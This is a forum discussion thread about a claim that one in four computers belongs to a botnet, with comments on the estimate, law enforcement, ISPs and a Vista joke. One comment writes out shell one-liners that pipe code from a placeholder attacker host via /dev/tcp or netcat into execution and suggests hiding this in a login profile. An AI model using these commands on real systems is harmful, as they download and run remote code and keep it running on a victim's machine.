25 Percent of All Computers in a Botnet?

Beckham's_Ponytail writes to mention an Ars Technica article, with some disturbing news out of the World Economic Forum in Davos, Switzerland. Vint Cerf, one of the 'fathers of the internet', has stated that the number of botnets online is larger than believed. So large, in fact, that he estimates that at this point one in four computers is infected with botnet software. We've discussed the rise of botnets numerous times here on Slashot, but the image of 150 million infected computers is more than a little bit sobering. With the extremely lucrative activities that can be done with botnets (such as password ripping, spamming, DDoSing), as well as reports of organized crime adopting 'cyber-terrorism' as a new line of income, is it likely that law enforcement will ever be able to curb this particular bane?

Bogus Numbers

[madsheep]

I would be much more inclined to believe that 1 in 4 PC's are infected with one or more of the following:

- Virus
- Trojan
- Worm
- Spyware
- Adware

A few of the above are used almost interchangeable (by some people) and have the capability of effectively making the machine into some form of a bot or zombie (remotely controlled or not). Now, to say that 1 in 4 machines are bots I would have to whole heartedly disagree with. This just isn't very likely. Especially since the lifetime of a specific botnet has gradually been decreasing. Faster AV responses, increased patching, and more bot competition will inherently decrease these odds. Sorry but the daddy of the internet or not.. I think he's off the mark.

South Korea?

[garcia]

With 99.9% of South Koreans "shackled" to Windows and "sitting behind fat pipes", why are we surprised?

I keep banning new IP ranges originating from .kr. It wouldn't surprise me at all if 99.5% of them were infected over there.

Cybercrime

[mandelbr0t]

I wonder how up-to-date Law Enforcement is on Cybercrime, i.e. crimes that are perpetrated in Cyberspace. There's just so many things that place them at a disadvantage. First, there's often the argument that no crime has even been committed. The 'net is a wild and crazy place, and if you're on it, there's personal responsibility for protecting yourself against the constant background of malware. Most people haven't been educated in this respect.

Second, IP forensics is a rather arcane art. Few are schooled, even fewer are of the calibre that Law Enforcement would need on their side. I'd guess that it's still more lucrative to be on the wrong side of the law, and given the nebulous nature of many of these crimes, there's just not much attraction to being a computer cop. There is a process, if you're interested, to become an expert witness in this field. That's a step in the right direction, but it's only part of the overall legal process. We still need Law Enforcement officials who are willing to press charges and a judge who's willing to sign required warrants.

Finally, there's the anonymity factor. Even IP forensics won't get your man. It'll get you their IP address, but it's a long way from the IP address to the culprit. There's dozens of arguments which could explain why your Internet connection has been implicated in a Cybercrime, most of them raising reasonable doubt.

It's possible, however. "Where there's a will, there's a way." We have to take these crimes out of Cyberspace, and start correlating information between network and reality. After all, there's generally financial transactions associated with large spam deliveries and 10k+ botnet DDoSing. It's a lot harder to claim that you're a victim of circumstance when not only was your IP spotted crawling through an ISPs subnet in suspicious ways, but you also received a few grand just before a mysterious DDoS that brought down a major website.

Re:Just install linux

[SCHecklerX]

botnets on *nix are easy. Most on windoze are deployed via idiot lusers just like most other malcode.

On linux, you only need a script that does the equivalent of this:

malcode < /dev/tcp/h4xx0rsbox/80

Or, if you have netcat available to you and prefer to use that tool:

nc h4xx0rsbox 80 | malcode

Or just include all the tcpip stuff in the trojan the idiot linux luser runs. It's easy enough to add it to their .profile or .shellrc, so it runs every time they log in, right?

These things aren't after your own files and such They are after your network resources, and these are trivial to get, even on *nix, my friend. When linux is popular amongst the idiots who run everything that they are sent or directed to download, they will certainly run it on that platform. And doing this stuff on linux is far more trivial than doing it on windoze thanks to the standard 'dev' tools and shells that are pretty much guaranteed to be available to the attacker.

Re:Request

[rtb61]

The major ISPs are the problem. The certainly can detect and clean it up but there is no profit in it, whilst there is a significant cost, not only in running the software to detect the suspicious activity on their networks but then informing the customer, assisting the customer in cleaning up their computer (they will demand it), then disconnecting the customers until they clean up their computer, then reconnecting the customer and repeating when the customer gets re-infected. The ISP I use do monitor their network for suspicious bot like activity and will inform their customers about problems and should the customer fail to clean up their computer, disconnect them but they are a quality ISP and sadly in the minority when it comes to putting quality of service ahead of that extra few percent of profit.

This is what you get as the result of profit first corporations, everybody else pays the costs and that cost often far exceeds (by a factor of thousands) the increase in profit that some asshat corporate executive wet dreams over.

I wonder how they got that 150M number?

[Darth+Muffin]

I wonder how they got that 150M number--if it's the number of Bots out there or the number of infected PCs? If it's the former, and I suspect it is, you can't equate that to the number of PCs. One PC can be a member of several botnets. From what I've seen (and most of you have probably too), a PC either seems to be clean or has 14 bots and 95 pieces of spyware on it depending on the user's habits and training.

This will change with Vista

[centron]

After getting feedback that the majority of their users have Spyware installed on their systems, Microsoft decided to incorporate spyware directly into the OS (embrace and extend). With the release of Microsoft Vista, your computer will come with software that runs silently in the background, regularly checks in with their network, and can be completely disabled remotely, similar to botnet software produced by others.

While this system is not pre-configured to send spam or generate DDOS attacks like many other botnets, it does have the ability to download new functionality in the background through Windows Update, so this capability could be added at a later date if enough customers continue to install third party botnets. This means that while your Vista computer is already part of a botnet out of the box, it's fairly dormant. As an indication of the omnionous potential of this enhanced system, Microsoft is calling it 'Windows Activation'.

You Are Required by Law

[rubmytummy]

You are required by law...

• to disconnect any equipment that interferes with the PSTN.
• to have your dog killed if it is rabid.
• to clean up a toxic chemical spill on your property.
• to take the medication that keeps you from spreading tuberculosis.
• to either fix any interference caused by your ham radio, or stop using the thing.

So, just how complicated is the solution to botnets and similar public network security issues?